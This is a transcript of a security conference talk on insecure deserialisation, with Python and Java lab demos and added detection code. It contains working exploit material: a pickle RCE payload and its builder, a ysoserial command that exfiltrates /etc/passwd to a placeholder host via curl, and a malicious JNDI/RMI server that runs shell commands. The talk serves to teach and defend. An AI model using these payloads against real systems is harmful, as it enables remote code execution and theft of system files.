Slide 1

Slide 1 text

Jan 30, 2022 OWASP Vellore Why So Serial? DEMYSTIFYING INSECURE DESERIALISATION

Slide 2

Slide 2 text

root_js jeyaseelan86 Why So Serial ? Demystifying Insecure Deserialisation $ whoami Jeya Seelan Security Researcher. Bug Hunter. Team Tamil Security Hub. Information Security Engineer, Zoho.

Slide 3

Slide 3 text

Let's get started! Are you ready?

Slide 4

Slide 4 text

Why So Serial ? Demystifying Insecure Deserialisation Today's Agenda
1 Preface
2 Serialisation: what? why? where?
3 Deserialisation
4 What can go wrong
5 Demo Time
6 Questions

Slide 5

Slide 5 text

Preface: Object-Oriented Programming. Object-oriented programming is all about creating "objects". An object is a group of interrelated variables and functions: the variables are usually called the properties (the state) of the object and the functions its behaviour. Example: a Human object with Height, Name, Age, Gender, Mother Tongue, etc.

Slide 6

Slide 6 text

HUMAN OBJECT Height: 170 cm, Age: 25, Name: Kumar, Gender: Male. PROBLEM? We need to store or send this object, and later get it back, without altering the state of the Human object.

Slide 7

Slide 7 text

THE SOLUTION SERIALIZATION

Slide 8

Slide 8 text

What? Why? Where? SERIALISATION

Slide 9

Slide 9 text

What? Serialisation is the process of converting an object's state into a format that can be stored or transmitted. It is also known as marshalling (or, in Python, pickling). Many popular programming languages have serialisation support built into the language core or the standard library.

Slide 10

Slide 10 text

Why? Objects are composed of several components; saving or delivering all the parts by hand typically requires significant coding effort, so serialisation is the standard way to capture an object into a shareable format. 👉🏻 Easy to transfer 👉🏻 Reversible to the original form 👉🏻 Persists state

Slide 11

Slide 11 text

Where?
Transferring data over the wire (messaging)
Storing data (in databases, on hard disk drives)
Remote procedure calls, e.g. SOAP
Caching and persistence
HTTP cookies, ViewState

Slide 12

Slide 12 text

HUMAN OBJECT Height: 170 cm, Age: 25, Name: Kumar, Gender: Male, GovtID: AABBCC → Serialisation → {object:Human, "Height":"170", "Age":"25", "Name":"Kumar", "Gender":"Male", "GovtID":"AABBCC"}

Slide 13

Slide 13 text

DESERIALISATION Deserialization is the opposite of serialization. Deserialization is the process of reconstructing a data structure or object from a series of bytes or a string.

Slide 14

Slide 14 text

{object:Human, "Height":"170", "Age":"25", "Name":"Kumar", "Gender":"Male", "GovtID":"AABBCC"} → Deserialisation → HUMAN OBJECT Height: 170 cm, Age: 25, Name: Kumar, Gender: Male, GovtID: AABBCC

Slide 15

Slide 15 text

WHAT CAN GO WRONG? HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC

Slide 16

Slide 16 text

MANIPULATED SERIALISED DATA (the attacker edits the GovtID field before sending it back): {object:Human, "Height":"170", "Age":"25", "Name":"Kumar", "Gender":"Male", "GovtID":"QQWWEE"} → Deserialisation → MODIFIED OBJECT: HUMAN OBJECT Height: 170 cm, Age: 25, Name: Kumar, Gender: Male, GovtID: QQWWEE. The application trusted the serialised bytes and reconstructed whatever the client sent: insecure.

Slide 19

Slide 19 text

DEMO TIME !

Slide 20

Slide 20 text

DEMO I: PYTHON DESERIALISATION. To set up the lab: docker pull jeyaseelan86/pydeser:pickle

Slide 21

Slide 21 text

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

Slide 22

Slide 22 text

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

Slide 23

Slide 23 text

EXPLOIT (base64-encoded pickle; it decodes to a protocol-4 stream that calls posix.system("touch hackedbydeserialisation") via the REDUCE opcode): gASVOAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB10b3VjaCBoYWNrZWRieWRlc2VyaWFsaXNhdGlvbpSFlFKULg==
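The following is an added example, not code from the slides or from the jeyaseelan86/pydeser lab image. It assumes the lab's /convert endpoint pickles an object holding the name and score query parameters and base64-encodes it (the Score class and its fields are an assumption). It shows the sink, reproduces the slide's payload from a __reduce__ method, disassembles a payload with pickletools without executing it, and blocks it with a restricted Unpickler.

```python
"""pickle demo: serialise a Score, craft the slide's RCE payload, inspect it
safely, and reject it with a find_class allowlist."""
import base64
import io
import os
import pickle
import pickletools


class Score:
    """Assumed shape of the object the lab's /convert endpoint pickles."""

    def __init__(self, name, score):
        self.name = name
        self.score = int(score)


def serialise(name, score):
    """What the endpoint does on the way out: pickle, then base64."""
    return base64.b64encode(pickle.dumps(Score(name, score), protocol=4)).decode()


def unsafe_loads(b64):
    """The sink: pickle.loads() on attacker-controlled bytes (vulnerable)."""
    return pickle.loads(base64.b64decode(b64))


# The exploit string from the slide; build_payload() below reproduces it.
SLIDE_PAYLOAD = (
    "gASVOAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB10b3VjaCBoYWNrZWRieWRl"
    "c2VyaWFsaXNhdGlvbpSFlFKULg=="
)
ON_POSIX = os.name == "posix"                      # os.system pickles as posix.system on Linux/macOS
EXPECTED_SYSTEM_GLOBAL = (os.system.__module__, "system")


def build_payload(cmd):
    """__reduce__ tells the unpickler which callable to invoke and with what
    arguments; here that is os.system(cmd). No Score object is involved at all."""
    class Exploit:
        def __reduce__(self):
            return (os.system, (cmd,))
    return base64.b64encode(pickle.dumps(Exploit(), protocol=4)).decode()


def find_globals(b64):
    """Disassemble with pickletools (never executes anything) and collect every
    module.name the stream would import via GLOBAL / STACK_GLOBAL."""
    refs, strings = set(), []
    for op, arg, _ in pickletools.genops(base64.b64decode(b64)):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":          # module and name are the last two strings pushed
            refs.add((strings[-2], strings[-1]))
        elif op.name in ("GLOBAL", "INST"):      # older form: "module name" in one argument
            module, name = arg.split()
            refs.add((module, name))
    return refs


class RestrictedUnpickler(pickle.Unpickler):
    """Only the classes we expect may be resolved; everything else is refused."""
    ALLOWED = {(Score.__module__, "Score")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(b64):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64))).load()


def rejected(b64):
    """True if the restricted unpickler refuses the stream."""
    try:
        safe_loads(b64)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    legit = serialise("ss", 44)
    print("legit globals  :", find_globals(legit))
    print("slide globals  :", find_globals(SLIDE_PAYLOAD))
    print("slide rejected :", rejected(SLIDE_PAYLOAD))
    print("reproduces slide payload:", build_payload("touch hackedbydeserialisation") == SLIDE_PAYLOAD)
```

find_globals is the triage step: a stream for a score record has no business referencing posix.system, so that line alone tells you what the payload will do. The allowlist unpickler is a mitigation of last resort; the real fix is not to unpickle untrusted data at all.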

Slide 24

Slide 24 text

DEMO II: JAVA JSF VIEWSTATE DESERIALISATION. To set up the lab: docker pull jeyaseelan86/javadeser:jsf

Slide 25

Slide 25 text

JSF Viewstate Deserialisation

Slide 26

Slide 26 text

JSF Viewstate Deserialisation

Slide 27

Slide 27 text

JSF Viewstate Deserialisation

Slide 28

Slide 28 text

JSF Viewstate Deserialisation

Slide 29

Slide 29 text

JSF Viewstate Deserialisation

Slide 30

Slide 30 text

JSF Viewstate Deserialisation

Slide 31

Slide 31 text

JSF Viewstate Deserialisation. Generate the payload with ysoserial (the Jdk7u21 gadget chain, which runs the given command when the unpatched JDK deserialises it; "ip" is a placeholder for your listener): java -jar ysoserial-master-8eb5cbfbf6-1.jar Jdk7u21 "curl -d @/etc/passwd http://ip"

Slide 32

Slide 32 text

JSF Viewstate Deserialisation

Slide 33

Slide 33 text

DETECTING INSECURE DESERIALISATION

Slide 34

Slide 34 text

WHITE BOX APPROACH: PYTHON. Look for these sinks fed with untrusted input: pickle.loads() / pickle.load(), marshal.loads(), yaml.load() (PyYAML without SafeLoader), jsonpickle.decode()

Slide 35

Slide 35 text

WHITE BOX APPROACH: JAVA. ObjectInputStream with readObject on an untrusted stream. Serializable classes that define readObject, readObjectNoData, readResolve or readExternal (custom deserialisation hooks are where gadget chains live). XMLDecoder fed with externally supplied, user-controlled input.
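An added example for the white-box approach on both the Python and the Java slide above (not from the talk): a small source scanner that flags the sinks listed, skips PyYAML calls that already use SafeLoader, and reports custom Java deserialisation hooks so a reviewer knows where to trace input from. The two source snippets are constructed for the demo.

```python
"""White-box triage: regex scan for deserialisation sinks in Python and Java source."""
import re

# (language, pattern, why it matters)
SINKS = [
    ("python", r"\bpickle\.loads?\(", "pickle: any importable callable can be invoked via __reduce__"),
    ("python", r"\bmarshal\.loads?\(", "marshal: intended for trusted, interpreter-generated data only"),
    ("python", r"\byaml\.(load|unsafe_load)\(", "PyYAML: use yaml.safe_load or Loader=SafeLoader"),
    ("python", r"\bjsonpickle\.decode\(", "jsonpickle: reconstructs arbitrary classes from JSON"),
    ("java", r"\bObjectInputStream\b|\.readObject\(|\.readUnshared\(", "native Java serialization sink"),
    ("java", r"\bXMLDecoder\b", "XMLDecoder executes method calls described in the XML"),
    ("java", r"\b(readObjectNoData|readResolve|readExternal)\s*\(", "custom deserialisation hook (gadget surface)"),
]
SAFE_YAML = re.compile(r"\byaml\.safe_load\(|Loader\s*=\s*(yaml\.)?SafeLoader\b")


def scan(source, language=None):
    """Return (line_number, language, source_line, note) for every sink found."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for lang, pattern, note in SINKS:
            if language and lang != language:
                continue
            if not re.search(pattern, line):
                continue
            if "yaml" in pattern and SAFE_YAML.search(line):   # yaml.load with SafeLoader is fine
                continue
            findings.append((lineno, lang, line.strip(), note))
    return findings


# Constructed samples (not code from the lab images).
SAMPLE_PY = """
import base64, marshal, pickle, yaml
obj = pickle.loads(base64.b64decode(request.args["data"]))
cfg = yaml.load(open("config.yml"), Loader=yaml.SafeLoader)
doc = yaml.load(request.data)
code = marshal.loads(blob)
"""

SAMPLE_JAVA = """ObjectInputStream in = new ObjectInputStream(request.getInputStream());
Object state = in.readObject();
private void readObjectNoData() throws ObjectStreamException { }
XMLDecoder d = new XMLDecoder(request.getInputStream());"""


if __name__ == "__main__":
    for finding in scan(SAMPLE_PY, "python") + scan(SAMPLE_JAVA, "java"):
        print("%3d %-6s %-60s %s" % finding)
```

A hit is a lead, not a verdict: the next step is to confirm whether the bytes reaching the sink can be influenced by a client (request body, cookie, ViewState, message queue, cache).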

Slide 36

Slide 36 text

BLACK BOX APPROACH: JAVA. Fingerprints of a serialised Java object in a parameter, cookie or body:
AC ED 00 05 in hex
rO0 at the start of base64
H4sIAAAAAAAAAJ at the start of base64 when the stream is gzip-compressed
Content-Type header application/x-java-serialized-object
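An added example for the black-box fingerprints above, not from the talk: it peels base64 and gzip off a parameter value such as javax.faces.ViewState, checks for the AC ED 00 05 magic, and reads the first class name out of the stream header without deserialising anything. The sample stream is a constructed serialisation of an empty java.util.HashMap; the helper that gzips it mimics the all-zero header Java's GZIPOutputStream writes, which is why the base64 starts with H4sIAAAAAAAAA (Python's own gzip module sets the XFL and OS bytes differently, so its output would not match the slide's prefix).

```python
"""Fingerprint Java serialization streams hidden behind base64 / gzip."""
import base64
import binascii
import gzip
import struct
import zlib

JAVA_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC + STREAM_VERSION 5
GZIP_MAGIC = b"\x1f\x8b"
TC_OBJECT, TC_CLASSDESC, TC_ARRAY = 0x73, 0x72, 0x75


def _b64decode(value):
    """Strict base64 decode (standard or URL-safe alphabet, padding optional)."""
    value = value.strip().replace("-", "+").replace("_", "/")
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None


def first_class_name(stream):
    """Class named by the first TC_CLASSDESC after the header, or None.
    Covers TC_OBJECT and TC_ARRAY (JSF state is usually an Object[])."""
    body = stream[4:]
    if len(body) < 4 or body[0] not in (TC_OBJECT, TC_ARRAY) or body[1] != TC_CLASSDESC:
        return None
    (length,) = struct.unpack(">H", body[2:4])
    name = body[4:4 + length]
    return name.decode("utf-8", "replace") if len(name) == length else None


def detect_java_serialized(value):
    """Describe the encoding layers and first class, or None if not Java serialization."""
    data = _b64decode(value)
    if data is None:
        return None
    layers = ["base64"]
    if data.startswith(GZIP_MAGIC):
        try:
            data = gzip.decompress(data)
        except (OSError, EOFError, zlib.error):
            return None
        layers.append("gzip")
    if not data.startswith(JAVA_MAGIC):
        return None
    return {"layers": layers, "hex_magic": data[:4].hex(), "first_class": first_class_name(data)}


# Constructed sample: an empty java.util.HashMap as Java serialises it
# (class descriptor, serialVersionUID, loadFactor/threshold fields, block data).
EMPTY_HASHMAP = bytes.fromhex(
    "aced0005" "73" "72" "0011" "6a6176612e7574696c2e486173684d6170"
    "0507dac1c31660d1" "03" "0002"
    "46" "000a" "6c6f6164466163746f72"
    "49" "0009" "7468726573686f6c64"
    "7870" "3f400000" "00000000"
    "77" "08" "00000010" "00000000" "78"
)


def java_style_gzip(data):
    """gzip with the 10-byte all-zero header Java's GZIPOutputStream emits."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)        # raw deflate, no zlib wrapper
    body = comp.compress(data) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(data) & 0xFFFFFFFF, len(data) & 0xFFFFFFFF)
    return b"\x1f\x8b\x08\x00" + b"\x00" * 6 + body + trailer


def as_viewstate(data, compress=False):
    """Encode a stream the way it would appear in a ViewState parameter."""
    return base64.b64encode(java_style_gzip(data) if compress else data).decode()


if __name__ == "__main__":
    for v in (as_viewstate(EMPTY_HASHMAP), as_viewstate(EMPTY_HASHMAP, compress=True), "score=44&name=ss"):
        print(v[:24], "->", detect_java_serialized(v))
```

The gzip check is done on the decoded bytes rather than on the base64 prefix on purpose: the "H4sI" characters only cover the gzip magic, and the following characters depend on header fields the producer chooses.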

Slide 38

Slide 38 text

DETECTION TOOLS (payload generators and scanners)
JAVA: ysoserial, marshalsec, JexBoss
.NET: ysoserial.net
PYTHON: deser-py

Slide 39

Slide 39 text

NOTABLE BUGS
1 pickle
2 Deserialisation in Oracle WebLogic, JBoss, Jenkins etc.
3 PyYAML deserialisation
4 Ruby deserialisation
5 Xtreme Object deserialisation
6 Jackson deserialisation

Slide 40

Slide 40 text

BONUS

Slide 41

Slide 41 text

A malicious RMI registry that serves a JNDI Reference abusing Tomcat's org.apache.naming.factory.BeanFactory ("forceString" turns a property setter into a call to ELProcessor.eval), so a JNDI lookup against it runs the EL payload. It needs Tomcat's org.apache.naming classes on the classpath.

    import java.rmi.registry.*;
    import com.sun.jndi.rmi.registry.*;
    import javax.naming.*;
    import org.apache.naming.ResourceRef;

    public class EvilRMIServerNew {
        public static void main(String[] args) throws Exception {
            System.out.println("Creating evil RMI registry on port 1097");
            Registry registry = LocateRegistry.createRegistry(1097);

            // prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,
                    "org.apache.naming.factory.BeanFactory", null);

            // redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
            ref.add(new StringRefAddr("forceString", "x=eval"));

            // expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
            ref.add(new StringRefAddr("x",
                    "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));

            ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
            registry.bind("Object", referenceWrapper);
        }
    }

Slide 42

Slide 42 text

Questions? Shoot your doubts!

Slide 43

Slide 43 text

Thank you! Have a great day ahead.

Slide 44

Slide 44 text

Reach me on ! @root_js @jeyaseelans @jeyaseelans86 @dramatic_admin